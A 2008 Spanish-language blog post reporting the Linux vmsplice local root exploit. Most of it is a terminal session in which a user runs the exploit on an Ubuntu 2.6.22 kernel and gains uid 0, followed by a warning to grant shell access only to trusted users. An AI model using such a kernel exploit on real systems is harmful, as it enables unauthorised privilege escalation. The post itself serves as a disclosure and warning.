Tu Mama Fue Mia

Linux kernel root .. A HUEVO!!!

by on Feb.10, 2008, under Programacion

Bueno ya se madrearon el kernel DE NUEVO!

Este codigo parece bastante viejo, lo cual reafirma que ha habido un HUEVO de 0hday y el haber leido la lista para parchar me dio miedo cosas como “al menos este exploit ya no funciona” y cosas como “a la madre se revienta el parche anterior” me hicieron preguntarme “que pedo con esto?”

Un ejemplo:

nahual@neuromancer:~$ uname -a
Linux neuromancer 2.6.22-14-generic #1 SMP Fri Feb 1 04:59:50 UTC 2008 i686 GNU/Linux
nahual@neuromancer:~$ id
uid=1000(nahual) gid=1000(nahual) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),1000(nahual)
nahual@neuromancer:~$ ./kernel_exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f1d000 .. 0xb7f4f000
[+] root
root@neuromancer:~# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),1000(nahual)
root@neuromancer:~# exit
exit
nahual@neuromancer:~$

La verdad esta MAS que de huevos, rapidisimo el code, el programa se puede entontrar AQUI

Este es un warning, NUNCA den shell en su server mas que a personas BIEN intensionadas.


1 Trackback or Pingback for this entry

Leave a Reply

You must be logged in to post a comment.

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!

Visit our friends!

A few highly recommended friends...